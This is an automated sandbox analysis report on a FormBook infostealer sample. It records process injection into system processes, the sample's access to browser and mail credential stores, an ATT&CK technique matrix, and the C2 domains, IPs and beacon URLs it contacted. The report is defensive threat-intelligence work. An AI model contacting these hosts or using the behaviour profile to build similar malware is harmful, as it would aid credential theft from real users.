                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtCreateUserProcess: Direct from: 0x7746371C
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtWriteVirtualMemory: Direct from: 0x7746490C
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtAllocateVirtualMemory: Direct from: 0x774648EC
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtQuerySystemInformation: Direct from: 0x774648CC
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtQueryVolumeInformationFile: Direct from: 0x77462F2C
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtCreateKey: Direct from: 0x77462C6C
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtReadVirtualMemory: Direct from: 0x77462E8C
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtSetInformationThread: Direct from: 0x77462B4C
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtQueryAttributesFile: Direct from: 0x77462E6C
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtDeviceIoControlFile: Direct from: 0x77462AEC
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtOpenSection: Direct from: 0x77462E0C
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtCreateFile: Direct from: 0x77462FEC
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtOpenFile: Direct from: 0x77462DCC
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtQueryInformationToken: Direct from: 0x77462CAC
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtTerminateThread: Direct from: 0x77462FCC
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtAllocateVirtualMemory: Direct from: 0x77462BEC
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | NtOpenKeyEx: Direct from: 0x77462B9C
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe protection: read write
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                Source: C:\Windows\SysWOW64\net.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                Source: C:\Windows\SysWOW64\net.exe | Thread register set: target process: 7960
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 30BA008
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0043916A LogonUserW | 0_2_0043916A
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0040D6D0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW | 0_2_0040D6D0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_004375B0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_004375B0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00436431 __wcsicoll,mouse_event,__wcsicoll,mouse_event | 0_2_00436431
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\XhAQ0Rk63O.exe"
                Source: C:\Program Files (x86)\zYScSBwNoNePOfijOxBAiGNdabdOErVfoaNAHOhxOLJzrVInQiewPquaPNMemUiipjDAaHJHsgTJdSv\IislGDEHlLEZDm.exe | Process created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"
                Source: C:\Windows\SysWOW64\net.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00445DD3 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity | 0_2_00445DD3
                Source: XhAQ0Rk63O.exe, IislGDEHlLEZDm.exe, 00000003.00000002.3868336055.0000000001141000.00000002.00000001.00040000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000000.1468432042.0000000001141000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3868336055.0000000001141000.00000002.00000001.00040000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000000.1468432042.0000000001141000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3868336055.0000000001141000.00000002.00000001.00040000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000000.1468432042.0000000001141000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: 0Program Manager
                Source: XhAQ0Rk63O.exe | Binary or memory string: @3PDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3868336055.0000000001141000.00000002.00000001.00040000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000000.1468432042.0000000001141000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_00410D10 cpuid | 0_2_00410D10
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_004223BC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter | 0_2_004223BC
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_004711D2 GetUserNameW | 0_2_004711D2
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0042039F __invoke_watson,__get_daylight,__invoke_watson,__get_daylight,__invoke_watson,____lc_codepage_func,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,__invoke_watson,__invoke_watson | 0_2_0042039F
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0040E470 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo | 0_2_0040E470

                Stealing of Sensitive Information

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1574269815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3866219592.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3863689053.0000000002960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3866264697.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1574620078.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1575222037.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3871219369.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\net.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\net.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: XhAQ0Rk63O.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 6, 0USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:cdeclwinapistdcallnonestrwstrintbooluintlongulongdwordshortushortwordbyteubytebooleanfloatdoubleptrhwndhandlelresultlparamwparamint64uint64int_ptruint_ptrlong_ptrulong_ptrdword_ptridispatch64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYadvapi32.dllRegDeleteKeyExW+.-.+-\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]ISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXISTSEXPANDmsctls_statusbar321tooltips_class32AutoIt v3 GUI%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----
Source: XhAQ0Rk63O.exe | Binary or memory string: WIN_XP
Source: XhAQ0Rk63O.exe | Binary or memory string: WIN_XPe
Source: XhAQ0Rk63O.exe | Binary or memory string: WIN_VISTA
Source: XhAQ0Rk63O.exe | Binary or memory string: WIN_7

                Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.1574269815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3866219592.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3863689053.0000000002960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.3866264697.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1574620078.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1575222037.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3871219369.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_004741BB socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_004741BB
Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0046483C socket,WSAGetLastError,bind,WSAGetLastError,listen,WSAGetLastError,closesocket, 0_2_0046483C
Source: C:\Users\user\Desktop\XhAQ0Rk63O.exe | Code function: 0_2_0047AD92 OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 0_2_0047AD92
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts
                1
                Native API
                1
                DLL Side-Loading
                1
                Exploitation for Privilege Escalation
                1
                Disable or Modify Tools
                1
                OS Credential Dumping
                2
                System Time Discovery
                Remote Services1
                Archive Collected Data
                4
                Ingress Tool Transfer
                Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter
                2
                Valid Accounts
                1
                Abuse Elevation Control Mechanism
                1
                Deobfuscate/Decode Files or Information
                21
                Input Capture
                1
                Account Discovery
                Remote Desktop Protocol1
                Data from Local System
                1
                Encrypted Channel
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                1
                Abuse Elevation Control Mechanism
                Security Account Manager2
                File and Directory Discovery
                SMB/Windows Admin Shares1
                Email Collection
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts
                3
                Obfuscated Files or Information
                NTDS116
                System Information Discovery
                Distributed Component Object Model21
                Input Capture
                4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation
                1
                DLL Side-Loading
                LSA Secrets241
                Security Software Discovery
                SSH3
                Clipboard Data
                Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts312
                Process Injection
                2
                Valid Accounts
                Cached Domain Credentials2
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion
                DCSync3
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation
                Proc Filesystem11
                Application Window Discovery
                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt312
                Process Injection
                /etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Behavior Graph ID: 1550245
Sample: XhAQ0Rk63O.exe
Start date: 06/11/2024
Architecture: WINDOWS
Score: 100

Start
• DNS/IP: www.066bet.xyz (Performs DNS queries to domains with low reputation); www.yushaliu.online; 21 other IPs or domains
• Signatures: Multi AV Scanner detection for submitted file; Yara detected FormBook; Machine Learning detection for sample; AI detected suspicious sample
• started: XhAQ0Rk63O.exe 1
  • Signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces; Contains functionality to detect sleep reduction / modifications
  • started: svchost.exe
    • Signatures: Maps a DLL or memory area into another process
    • injected: IislGDEHlLEZDm.exe
      • DNS/IP: www.pluribiz.life 209.74.64.58, ports 49721, 49722, 49723 (MULTIBAND-NEWHOPEUS, United States); ppp84k45ss7ehy8ypic5x.limelightcdn.com 23.106.59.18, ports 49749, 49750, 49751 (LEASEWEB-UK-LON-11GB, United Kingdom); 8 other IPs or domains
      • Signatures: Found direct / indirect Syscall (likely to bypass EDR)
      • started: net.exe 13
        • Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 2 other signatures
        • started: firefox.exe

Source | Detection | Scanner | Label | Link
XhAQ0Rk63O.exe | 75% | ReversingLabs | Win32.Trojan.AutoitInject |
XhAQ0Rk63O.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
webredir.vip.gandi.net | 217.70.184.50 | true | false | | high
fiqsth.vip | 3.33.130.190 | true | false | | unknown
bio-thymus.com | 3.33.130.190 | true | false | | unknown
www.pluribiz.life | 209.74.64.58 | true | false | | unknown
corpseflowerwatch.org | 3.33.130.190 | true | false | | unknown
www.evoo.website | 128.65.195.180 | true | false | | unknown
www.wukong.college | 47.52.221.8 | true | false | | unknown
marketprediction.app | 3.33.130.190 | true | false | | unknown
www.yushaliu.online | 208.91.197.27 | true | false | | unknown
vnxoso88.art | 66.29.146.14 | true | false | | unknown
www.kdtzhb.top | 47.242.89.146 | true | false | | unknown
www.migraine-massages.pro | 199.59.243.227 | true | false | | unknown
ppp84k45ss7ehy8ypic5x.limelightcdn.com | 23.106.59.18 | true | false | | unknown
www.bulls777.pro | unknown | unknown | false | | unknown
www.astorg-group.info | unknown | unknown | false | | unknown
www.bio-thymus.com | unknown | unknown | false | | unknown
www.marketprediction.app | unknown | unknown | false | | unknown
www.fiqsth.vip | unknown | unknown | false | | unknown
www.vehiculargustav.click | unknown | unknown | false | | unknown
www.corpseflowerwatch.org | unknown | unknown | false | | unknown
www.vnxoso88.art | unknown | unknown | false | | unknown
www.066bet.xyz | unknown | unknown | true | | unknown
www.4nk.education | unknown | unknown | false | | unknown
                                                                                    high
                                                                                    https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnet.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      http://www.yushaliu.online/px.js?ch=1net.exe, 00000004.00000002.3873627887.0000000006460000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      http://www.yushaliu.online/px.js?ch=2net.exe, 00000004.00000002.3873627887.0000000006460000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
IP | Domain | Country | ASN | ASN Name | Malicious
47.52.221.8 | www.wukong.college | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
128.65.195.180 | www.evoo.website | Switzerland | 29222 | INFOMANIAK-ASCH | false
23.106.59.18 | ppp84k45ss7ehy8ypic5x.limelightcdn.com | United Kingdom | 205544 | LEASEWEB-UK-LON-11GB | false
199.59.243.227 | www.migraine-massages.pro | United States | 395082 | BODIS-NJUS | false
217.70.184.50 | webredir.vip.gandi.net | France | 29169 | GANDI-ASDomainnameregistrar-httpwwwgandinetFR | false
208.91.197.27 | www.yushaliu.online | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | false
209.74.64.58 | www.pluribiz.life | United States | 31744 | MULTIBAND-NEWHOPEUS | false
66.29.146.14 | vnxoso88.art | United States | 19538 | ADVANTAGECOMUS | false
3.33.130.190 | fiqsth.vip | United States | 8987 | AMAZONEXPANSIONGB | false
47.242.89.146 | www.kdtzhb.top | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1550245
Start date and time: 2024-11-06 15:58:13 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 34s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 10
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: XhAQ0Rk63O.exe (renamed because the original name is a hash value)
Original Sample Name: b365215db2a43106d746921ff99c7a8a6c2fc80965dc1567480a38021366848d.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/2@16/10
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 90%
• Number of executed functions: 42
• Number of non-executed functions: 312
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
• Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may be missing disassembly code information
• Report size exceeded the maximum capacity and may be missing disassembly code
• VT rate limit hit for: XhAQ0Rk63O.exe
Time | Type | Description
10:00:00 | API Interceptor | 10197300x Sleep call for process: net.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
128.65.195.180 | TT Application copy.exe | malicious | FormBook | www.airbnbneuchatel.com/0zfk/
128.65.195.180 | Inquiry Second Reminder.exe | malicious | FormBook | www.spx21.com/dz25/?9rz0r6F8=IXjUS8uTLEXXc4IFKSk4QK94/u/v4rSLXrhItQqacAC9jZYA+NiFbTAYaFgWrpFehgvY&RP=7nHTxl6
128.65.195.180 | LPOH2401-3172(Mr.Kem Sophea)-pdf.exe | malicious | FormBook | www.zimmerli.online/btrd/?E2MXNj=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT&bt-=XVJdUxa8
128.65.195.180 | PGiUp8uqGt.exe | malicious | FormBook | www.zimmerli.online/btrd/?2dz=odelT&-Z1dnr=TxZDFylv+UCZ8Ebi8mWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmWvQ8UoYQ8fT
128.65.195.180 | LGSTXJeTc4.exe | malicious | FormBook | www.zimmerli.online/btrd/?bXUH_86P=TxZDFykb+0Hph0GWgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPqsFIgKb+U&lzud6=y6gL_DWH
128.65.195.180 | MVEjijPB3m.exe | malicious | FormBook | www.zimmerli.online/btrd/?7n=TxZDFykeijDphECdgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPAz14gOZ2U&q6AhA=ORGpz4MpyH
128.65.195.180 | luK5jtgopg.exe | malicious | FormBook | www.zimmerli.online/btrd/?_vgLOdj=TxZDFykeijDphECdgWWLM6uN5HzrA8yC537y5vp7a9LQ6IyIa147dvtWmVPAz14gOZ2U&W0Ddg8=u2Jd-dT8bPB0k
128.65.195.180 | iKF9HO6p8LJfhir.exe | malicious | FormBook, Play | www.derbychess.com/qfhc/?cNu_sBI=/EU0TJ33NrNEwJWeUkg6fs1zHBP8tyTAxpPbdAZGcGI7teHih2Di61DmnnLdGhPQQ4PfxHVKxG9+4lZ8KgQXkVKyniTIgT66iQ==&mg3Oy_=oFKCX
128.65.195.180 | IN0982746R789.exe | malicious | FormBook, Play | www.derbychess.com/qfhc/?JmZH=/EU0TJ33NrNEwJWeUkg6fs1zHBP8tyTAxpPbdAZGcGI7teHih2Di61DmnnLdGhPQQ4PfxHVKxG9+4lZ8KgQXkX7o5TTIhSCIiQ==&e_6PiF=8ZYjPlE
128.65.195.180 | EEcbDKtUD5MqK0g.exe | malicious | FormBook | www.derbychess.com/qfhc/?eNcLv2J=/EU0TJ33NrNEwJWeUkg6fs1zHBP8tyTAxpPbdAZGcGI7teHih2Di61DmnnLdGhPQQ4PfxHVKxG9+4lZ8KgQAt27vs3PAxgHskA==&mq=srEb2z_f
23.106.59.18 | SecuriteInfo.com.FileRepMalware.15071.2577.exe | malicious | Unknown | dotdo.net/chkn.php?n=4528372
